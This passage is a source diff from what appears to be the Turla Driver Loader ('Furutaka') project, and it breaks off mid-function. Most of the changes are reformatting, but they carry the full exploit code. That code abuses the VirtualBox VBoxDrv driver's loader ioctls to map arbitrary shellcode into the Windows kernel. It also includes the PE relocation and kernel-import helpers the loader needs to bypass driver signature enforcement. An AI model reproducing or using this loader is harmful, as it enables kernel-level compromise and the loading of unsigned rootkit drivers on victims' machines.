SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +) { - SC_HANDLE schService; + SC_HANDLE schService; - schService = CreateService(SchSCManager, // SCManager database - DriverName, // name of service - DriverName, // name to display - SERVICE_ALL_ACCESS, // desired access - SERVICE_KERNEL_DRIVER, // service type - SERVICE_DEMAND_START, // start type - SERVICE_ERROR_NORMAL, // error control type - ServiceExe, // service's binary - NULL, // no load ordering group - NULL, // no tag identifier - NULL, // no dependencies - NULL, // LocalSystem account - NULL // no password - ); - if (schService == NULL) { - return FALSE; - } + schService = CreateService(SchSCManager, // SCManager database + DriverName, // name of service + DriverName, // name to display + SERVICE_ALL_ACCESS, // desired access + SERVICE_KERNEL_DRIVER, // service type + SERVICE_DEMAND_START, // start type + SERVICE_ERROR_NORMAL, // error control type + ServiceExe, // service's binary + NULL, // no load ordering group + NULL, // no tag identifier + NULL, // no dependencies + NULL, // LocalSystem account + NULL // no password + ); + if (schService == NULL) { + return FALSE; + } - CloseServiceHandle(schService); - return TRUE; + CloseServiceHandle(schService); + return TRUE; } /* @@ -63,26 +63,26 @@ BOOL scmInstallDriver( * */ BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL ret; + SC_HANDLE schService; + BOOL ret; - schService = OpenService(SchSCManager, - DriverName, - SERVICE_ALL_ACCESS - ); - if (schService == NULL) - return FALSE; + schService = OpenService(SchSCManager, + DriverName, + SERVICE_ALL_ACCESS + ); + if (schService == NULL) + return FALSE; - ret = StartService(schService, 0, NULL) - || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; + ret = StartService(schService, 0, NULL) + || GetLastError() == ERROR_SERVICE_ALREADY_RUNNING; - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -94,35 +94,35 @@ BOOL scmStartDriver( * */ BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ) + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +) { - TCHAR completeDeviceName[64]; - HANDLE hDevice; + TCHAR completeDeviceName[64]; + HANDLE hDevice; - RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); - wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); + RtlSecureZeroMemory(completeDeviceName, sizeof(completeDeviceName)); + wsprintf(completeDeviceName, TEXT("\\\\.\\%s"), DriverName); - hDevice = CreateFile(completeDeviceName, - GENERIC_READ | GENERIC_WRITE, - 0, - NULL, - OPEN_EXISTING, - FILE_ATTRIBUTE_NORMAL, - NULL - ); - if (hDevice == INVALID_HANDLE_VALUE) - return FALSE; + hDevice = CreateFile(completeDeviceName, + GENERIC_READ | GENERIC_WRITE, + 0, + NULL, + OPEN_EXISTING, + FILE_ATTRIBUTE_NORMAL, + NULL + ); + if (hDevice == INVALID_HANDLE_VALUE) + return FALSE; - if (lphDevice) { - *lphDevice = hDevice; - } - else { - CloseHandle(hDevice); - } + if (lphDevice) { + *lphDevice = hDevice; + } + else { + CloseHandle(hDevice); + } - return TRUE; + return TRUE; } /* @@ -134,39 +134,39 @@ BOOL scmOpenDevice( * */ BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - INT iRetryCount; - SC_HANDLE schService; - BOOL ret; - SERVICE_STATUS serviceStatus; + BOOL ret; + INT iRetryCount; + SC_HANDLE schService; + SERVICE_STATUS serviceStatus; - ret = FALSE; - schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); - if (schService == NULL) { - return ret; - } + ret = FALSE; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService == NULL) { + return ret; + } - iRetryCount = 5; - do { - SetLastError(0); + iRetryCount = 5; + do { + SetLastError(0); - ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); - if (ret == TRUE) - break; + ret = ControlService(schService, SERVICE_CONTROL_STOP, &serviceStatus); + if (ret != FALSE) + break; - if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) - break; + if (GetLastError() != ERROR_DEPENDENT_SERVICES_RUNNING) + break; - Sleep(1000); - iRetryCount--; - } while (iRetryCount); + Sleep(1000); + iRetryCount--; + } while (iRetryCount); - CloseServiceHandle(schService); + CloseServiceHandle(schService); - return ret; + return ret; } /* @@ -178,27 +178,19 @@ BOOL scmStopDriver( * */ BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ) + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +) { - SC_HANDLE schService; - BOOL bResult = FALSE; + SC_HANDLE schService; + BOOL bResult = FALSE; - schService = OpenService(SchSCManager, - DriverName, - DELETE - ); - - if (schService == NULL) { - return bResult; - } - - bResult = DeleteService(schService); - - CloseServiceHandle(schService); - - return bResult; + schService = OpenService(SchSCManager, DriverName, SERVICE_ALL_ACCESS); + if (schService) { + bResult = DeleteService(schService); + CloseServiceHandle(schService); + } + return bResult; } /* @@ -210,26 +202,23 @@ BOOL scmRemoveDriver( * */ BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ) + _In_ LPCTSTR Name +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, - NULL, - SC_MANAGER_ALL_ACCESS - ); - if (schSCManager) { - scmStopDriver(schSCManager, Name); - bResult = scmRemoveDriver(schSCManager, Name); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmStopDriver(schSCManager, Name); + bResult = scmRemoveDriver(schSCManager, Name); + CloseServiceHandle(schSCManager); + } + return bResult; } /* @@ -241,25 +230,25 @@ BOOL scmUnloadDeviceDriver( * */ BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ) + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +) { - SC_HANDLE schSCManager; - BOOL bResult = FALSE; + SC_HANDLE schSCManager; + BOOL bResult = FALSE; - if (Name == NULL) { - return bResult; - } + if (Name == NULL) { + return bResult; + } - schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); - if (schSCManager) { - scmRemoveDriver(schSCManager, Name); - scmInstallDriver(schSCManager, Name, Path); - scmStartDriver(schSCManager, Name); - bResult = scmOpenDevice(Name, lphDevice); - CloseServiceHandle(schSCManager); - } - return bResult; + schSCManager = OpenSCManager(NULL, NULL, SC_MANAGER_ALL_ACCESS); + if (schSCManager) { + scmRemoveDriver(schSCManager, Name); + scmInstallDriver(schSCManager, Name, Path); + scmStartDriver(schSCManager, Name); + bResult = scmOpenDevice(Name, lphDevice); + CloseServiceHandle(schSCManager); + } + return bResult; } diff --git a/Source/Furutaka/instdrv.h b/Source/Furutaka/instdrv.h index 91400f2..42cf1cb 100644 --- a/Source/Furutaka/instdrv.h +++ b/Source/Furutaka/instdrv.h @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2015, portions (C) Mark Russinovich, FileMon +* (C) COPYRIGHT AUTHORS, 2015 - 2017, portions (C) Mark Russinovich, FileMon * * TITLE: INSTDRV.H * * VERSION: 1.10 * -* DATE: 10 Mar 2015 +* DATE: 17 Apr 2017 * * Common header file for the program SCM usage. * @@ -16,39 +16,40 @@ * PARTICULAR PURPOSE. * *******************************************************************************/ +#pragma once BOOL scmInstallDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName, - _In_opt_ LPCTSTR ServiceExe - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName, + _In_opt_ LPCTSTR ServiceExe +); BOOL scmStartDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmOpenDevice( - _In_ LPCTSTR DriverName, - _Inout_opt_ PHANDLE lphDevice - ); + _In_ LPCTSTR DriverName, + _Inout_opt_ PHANDLE lphDevice +); BOOL scmStopDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmRemoveDriver( - _In_ SC_HANDLE SchSCManager, - _In_ LPCTSTR DriverName - ); + _In_ SC_HANDLE SchSCManager, + _In_ LPCTSTR DriverName +); BOOL scmUnloadDeviceDriver( - _In_ LPCTSTR Name - ); + _In_ LPCTSTR Name +); BOOL scmLoadDeviceDriver( - _In_ LPCTSTR Name, - _In_opt_ LPCTSTR Path, - _Inout_ PHANDLE lphDevice - ); + _In_ LPCTSTR Name, + _In_opt_ LPCTSTR Path, + _Inout_ PHANDLE lphDevice +); diff --git a/Source/Furutaka/main.c b/Source/Furutaka/main.c index aaad15b..c0b7c24 100644 --- a/Source/Furutaka/main.c +++ b/Source/Furutaka/main.c @@ -1,12 +1,12 @@ /******************************************************************************* * -* (C) COPYRIGHT AUTHORS, 2016 +* (C) COPYRIGHT AUTHORS, 2016 - 2017 * * TITLE: MAIN.C * -* VERSION: 1.00 +* VERSION: 1.10 * -* DATE: 04 Feb 2016 +* DATE: 17 Apr 2017 * * Furutaka entry point. * @@ -32,7 +32,7 @@ HANDLE g_ConOut = NULL; HANDLE g_hVBox = INVALID_HANDLE_VALUE; BOOL g_ConsoleOutput = FALSE; BOOL g_VBoxInstalled = FALSE; -WCHAR BE = 0xFEFF; +WCHAR g_BE = 0xFEFF; #define VBoxDrvSvc TEXT("VBoxDrv") #define supImageName "furutaka" @@ -40,11 +40,11 @@ WCHAR BE = 0xFEFF; #define PAGE_SIZE 0x1000 #define scDataOffset 0x214 //shellcode data offset -#define T_LOADERTITLE TEXT("Turla Driver Loader v1.0 (04/02/16)") +#define T_LOADERTITLE TEXT("Turla Driver Loader v1.1 (17/04/17)") #define T_LOADERUNSUP TEXT("Unsupported WinNT version\r\n") #define T_LOADERRUN TEXT("Another instance running, close it before\r\n") #define T_LOADERUSAGE TEXT("Usage: loader drivertoload\n\re.g. loader mydrv.sys\r\n") -#define T_LOADERINTRO TEXT("Turla Driver Loader v1.0.0 started\r\n(c) 2016 TDL Project\r\nSupported x64 OS : 7 and above\r\n") +#define T_LOADERINTRO TEXT("Turla Driver Loader v1.1.0 started\r\n(c) 2016 - 2017 TDL Project\r\nSupported x64 OS : 7 and above\r\n") /* * TDLVBoxInstalled @@ -55,23 +55,23 @@ WCHAR BE = 0xFEFF; * */ BOOL TDLVBoxInstalled( - VOID - ) + VOID +) { - BOOL bPresent = FALSE; - LRESULT lRet; - HKEY hKey = NULL; - - lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), - 0, KEY_READ, &hKey); + BOOL bPresent = FALSE; + LRESULT lRet; + HKEY hKey = NULL; - bPresent = (hKey != NULL); + lRet = RegOpenKeyEx(HKEY_LOCAL_MACHINE, TEXT("Software\\Oracle\\VirtualBox"), + 0, KEY_READ, &hKey); - if (hKey) { - RegCloseKey(hKey); - } + bPresent = (hKey != NULL); - return bPresent; + if (hKey) { + RegCloseKey(hKey); + } + + return bPresent; } /* @@ -83,51 +83,51 @@ BOOL TDLVBoxInstalled( * */ void TDLRelocImage( - ULONG_PTR Image, - ULONG_PTR NewImageBase - ) + ULONG_PTR Image, + ULONG_PTR NewImageBase +) { - PIMAGE_OPTIONAL_HEADER popth; - PIMAGE_BASE_RELOCATION rel; - DWORD_PTR delta; - LPWORD chains; - DWORD c, p, rsz; + PIMAGE_OPTIONAL_HEADER popth; + PIMAGE_BASE_RELOCATION rel; + DWORD_PTR delta; + LPWORD chains; + DWORD c, p, rsz; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) - if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) - { - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + - popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); + if (popth->NumberOfRvaAndSizes > IMAGE_DIRECTORY_ENTRY_BASERELOC) + if (popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress != 0) + { + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)Image + + popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].VirtualAddress); - rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; - delta = (DWORD_PTR)NewImageBase - popth->ImageBase; - c = 0; + rsz = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_BASERELOC].Size; + delta = (DWORD_PTR)NewImageBase - popth->ImageBase; + c = 0; - while (c < rsz) { - p = sizeof(IMAGE_BASE_RELOCATION); - chains = (LPWORD)((PBYTE)rel + p); + while (c < rsz) { + p = sizeof(IMAGE_BASE_RELOCATION); + chains = (LPWORD)((PBYTE)rel + p); - while (p < rel->SizeOfBlock) { + while (p < rel->SizeOfBlock) { - switch (*chains >> 12) { - case IMAGE_REL_BASED_HIGHLOW: - *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; - break; - case IMAGE_REL_BASED_DIR64: - *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; - break; - } + switch (*chains >> 12) { + case IMAGE_REL_BASED_HIGHLOW: + *(LPDWORD)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += (DWORD)delta; + break; + case IMAGE_REL_BASED_DIR64: + *(PULONGLONG)((ULONG_PTR)Image + rel->VirtualAddress + (*chains & 0x0fff)) += delta; + break; + } - chains++; - p += sizeof(WORD); - } + chains++; + p += sizeof(WORD); + } - c += rel->SizeOfBlock; - rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); - } - } + c += rel->SizeOfBlock; + rel = (PIMAGE_BASE_RELOCATION)((PBYTE)rel + rel->SizeOfBlock); + } + } } /* @@ -139,19 +139,19 @@ void TDLRelocImage( * */ ULONG_PTR TDLGetProcAddress( - ULONG_PTR KernelBase, - ULONG_PTR KernelImage, - LPCSTR FunctionName - ) + ULONG_PTR KernelBase, + ULONG_PTR KernelImage, + LPCSTR FunctionName +) { - ANSI_STRING cStr; - ULONG_PTR pfn = 0; + ANSI_STRING cStr; + ULONG_PTR pfn = 0; - RtlInitString(&cStr, FunctionName); - if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) - return 0; + RtlInitString(&cStr, FunctionName); + if (!NT_SUCCESS(LdrGetProcedureAddress((PVOID)KernelImage, &cStr, 0, (PVOID)&pfn))) + return 0; - return KernelBase + (pfn - KernelImage); + return KernelBase + (pfn - KernelImage); } /* @@ -163,43 +163,43 @@ ULONG_PTR TDLGetProcAddress( * */ void TDLResolveKernelImport( - ULONG_PTR Image, - ULONG_PTR KernelImage, - ULONG_PTR KernelBase - ) + ULONG_PTR Image, + ULONG_PTR KernelImage, + ULONG_PTR KernelBase +) { - PIMAGE_OPTIONAL_HEADER popth; - ULONG_PTR ITableVA, *nextthunk; - PIMAGE_IMPORT_DESCRIPTOR ITable; - PIMAGE_THUNK_DATA pthunk; - PIMAGE_IMPORT_BY_NAME pname; - ULONG i; + PIMAGE_OPTIONAL_HEADER popth; + ULONG_PTR ITableVA, *nextthunk; + PIMAGE_IMPORT_DESCRIPTOR ITable; + PIMAGE_THUNK_DATA pthunk; + PIMAGE_IMPORT_BY_NAME pname; + ULONG i; - popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; + popth = &RtlImageNtHeader((PVOID)Image)->OptionalHeader; - if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) - return; + if (popth->NumberOfRvaAndSizes <= IMAGE_DIRECTORY_ENTRY_IMPORT) + return; - ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; - if (ITableVA == 0) - return; + ITableVA = popth->DataDirectory[IMAGE_DIRECTORY_ENTRY_IMPORT].VirtualAddress; + if (ITableVA == 0) + return; - ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); + ITable = (PIMAGE_IMPORT_DESCRIPTOR)(Image + ITableVA); - if (ITable->OriginalFirstThunk == 0) - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); - else - pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); + if (ITable->OriginalFirstThunk == 0) + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->FirstThunk); + else + pthunk = (PIMAGE_THUNK_DATA)(Image + ITable->OriginalFirstThunk); - for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { - nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); - if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { - pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); - } - else - nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); - } + for (i = 0; pthunk->u1.Function != 0; i++, pthunk++) { + nextthunk = (PULONG_PTR)(Image + ITable->FirstThunk); + if ((pthunk->u1.Ordinal & IMAGE_ORDINAL_FLAG) == 0) { + pname = (PIMAGE_IMPORT_BY_NAME)((PCHAR)Image + pthunk->u1.AddressOfData); + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, pname->Name); + } + else + nextthunk[i] = TDLGetProcAddress(KernelBase, KernelImage, (LPCSTR)(pthunk->u1.Ordinal & 0xffff)); + } } /* @@ -211,160 +211,160 @@ void TDLResolveKernelImport( * */ void TDLExploit( - LPVOID Shellcode, - ULONG CodeSize - ) + LPVOID Shellcode, + ULONG CodeSize +) { - SUPCOOKIE Cookie; - SUPLDROPEN OpenLdr; - DWORD bytesIO = 0; - RTR0PTR ImageBase = NULL; - ULONG_PTR paramOut; - PSUPLDRLOAD pLoadTask = NULL; - SUPSETVMFORFAST vmFast; - SUPLDRFREE ldrFree; - SIZE_T memIO; - WCHAR text[256]; + SUPCOOKIE Cookie; + SUPLDROPEN OpenLdr; + DWORD bytesIO = 0; + RTR0PTR ImageBase = NULL; + ULONG_PTR paramOut; + PSUPLDRLOAD pLoadTask = NULL; + SUPSETVMFORFAST vmFast; + SUPLDRFREE ldrFree; + SIZE_T memIO; + WCHAR text[256]; - while (g_hVBox != INVALID_HANDLE_VALUE) { - RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); - Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; - Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; - Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; - Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - Cookie.Hdr.rc = 0; - Cookie.u.In.u32ReqVersion = 0; - Cookie.u.In.u32MinVersion = 0x00070002; - RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); + while (g_hVBox != INVALID_HANDLE_VALUE) { + RtlSecureZeroMemory(&Cookie, sizeof(SUPCOOKIE)); + Cookie.Hdr.u32Cookie = SUPCOOKIE_INITIAL_COOKIE; + Cookie.Hdr.cbIn = SUP_IOCTL_COOKIE_SIZE_IN; + Cookie.Hdr.cbOut = SUP_IOCTL_COOKIE_SIZE_OUT; + Cookie.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + Cookie.Hdr.rc = 0; + Cookie.u.In.u32ReqVersion = 0; + Cookie.u.In.u32MinVersion = 0x00070002; + RtlCopyMemory(Cookie.u.In.szMagic, SUPCOOKIE_MAGIC, sizeof(SUPCOOKIE_MAGIC)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, - &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, - SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); - break; - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_COOKIE, + &Cookie, SUP_IOCTL_COOKIE_SIZE_IN, &Cookie, + SUP_IOCTL_COOKIE_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_COOKIE call failed"), g_ConsoleOutput, TRUE); + break; + } - RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); - OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; - OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; - OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - OpenLdr.Hdr.rc = 0; - OpenLdr.u.In.cbImage = CodeSize; - RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); + RtlSecureZeroMemory(&OpenLdr, sizeof(OpenLdr)); + OpenLdr.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + OpenLdr.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + OpenLdr.Hdr.cbIn = SUP_IOCTL_LDR_OPEN_SIZE_IN; + OpenLdr.Hdr.cbOut = SUP_IOCTL_LDR_OPEN_SIZE_OUT; + OpenLdr.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + OpenLdr.Hdr.rc = 0; + OpenLdr.u.In.cbImage = CodeSize; + RtlCopyMemory(OpenLdr.u.In.szName, supImageName, sizeof(supImageName)); - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, - SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); - u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_OPEN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_IN, &OpenLdr, + SUP_IOCTL_LDR_OPEN_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_OPEN call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: OpenLdr.u.Out.pvImageBase = 0x")); + u64tohex((ULONG_PTR)OpenLdr.u.Out.pvImageBase, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - ImageBase = OpenLdr.u.Out.pvImageBase; + ImageBase = OpenLdr.u.Out.pvImageBase; - memIO = PAGE_SIZE + CodeSize; - NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, - MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); + memIO = PAGE_SIZE + CodeSize; + NtAllocateVirtualMemory(NtCurrentProcess(), &pLoadTask, 0, &memIO, + MEM_COMMIT | MEM_RESERVE, PAGE_READWRITE); - if (pLoadTask == NULL) - break; + if (pLoadTask == NULL) + break; - pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - pLoadTask->Hdr.cbIn = - (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; - pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; - pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; - pLoadTask->Hdr.rc = 0; - pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; - pLoadTask->u.In.pvImageBase = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; - pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; - RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); - pLoadTask->u.In.cbImage = CodeSize; + pLoadTask->Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + pLoadTask->Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + pLoadTask->Hdr.cbIn = + (ULONG_PTR)(&((PSUPLDRLOAD)0)->u.In.achImage) + CodeSize; + pLoadTask->Hdr.cbOut = SUP_IOCTL_LDR_LOAD_SIZE_OUT; + pLoadTask->Hdr.fFlags = SUPREQHDR_FLAGS_MAGIC; + pLoadTask->Hdr.rc = 0; + pLoadTask->u.In.eEPType = SUPLDRLOADEP_VMMR0; + pLoadTask->u.In.pvImageBase = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0 = (RTR0PTR)supImageHandle; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryEx = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryFast = ImageBase; + pLoadTask->u.In.EP.VMMR0.pvVMMR0EntryInt = ImageBase; + RtlCopyMemory(pLoadTask->u.In.achImage, Shellcode, CodeSize); + pLoadTask->u.In.cbImage = CodeSize; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, - pLoadTask, pLoadTask->Hdr.cbIn, - pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) - { - cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); - break; - } - else { - _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase, _strend(text)); - _strcat(text, TEXT(", size = 0x")); - ultohex(CodeSize, _strend(text)); + if (!DeviceIoControl(g_hVBox, SUP_IOCTL_LDR_LOAD, + pLoadTask, pLoadTask->Hdr.cbIn, + pLoadTask, SUP_IOCTL_LDR_LOAD_SIZE_OUT, &bytesIO, NULL)) + { + cuiPrintText(g_ConOut, TEXT("Ldr: SUP_IOCTL_LDR_LOAD call failed"), g_ConsoleOutput, TRUE); + break; + } + else { + _strcpy(text, TEXT("Ldr: SUP_IOCTL_LDR_LOAD, success\r\n\tShellcode mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase, _strend(text)); + _strcat(text, TEXT(", size = 0x")); + ultohex(CodeSize, _strend(text)); - _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); - u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); - cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); - } + _strcat(text, TEXT("\r\n\tDriver image mapped at 0x")); + u64tohex((ULONG_PTR)ImageBase + scDataOffset, _strend(text)); + cuiPrintText(g_ConOut, text, g_ConsoleOutput, TRUE); + } - RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); - vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; - vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; - vmFast.Hdr.rc = 0; - vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; - vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; - vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; - vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; + RtlSecureZeroMemory(&vmFast, sizeof(vmFast)); + vmFast.Hdr.u32Cookie = Cookie.u.Out.u32Cookie; + vmFast.Hdr.u32SessionCookie = Cookie.u.Out.u32SessionCookie; + vmFast.Hdr.rc = 0; + vmFast.Hdr.fFlags = SUPREQHDR_FLAGS_DEFAULT; + vmFast.Hdr.cbIn = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN; + vmFast.Hdr.cbOut = SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT; + vmFast.u.In.pVMR0 = (LPVOID)supImageHandle; - if (!DeviceIoControl(g_hVBox, SUP_IOCTL_SET_VM_FOR_FAST, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_IN, - &vmFast, SUP_IOCTL_SET_VM_FOR_FAST_SIZE_OUT, 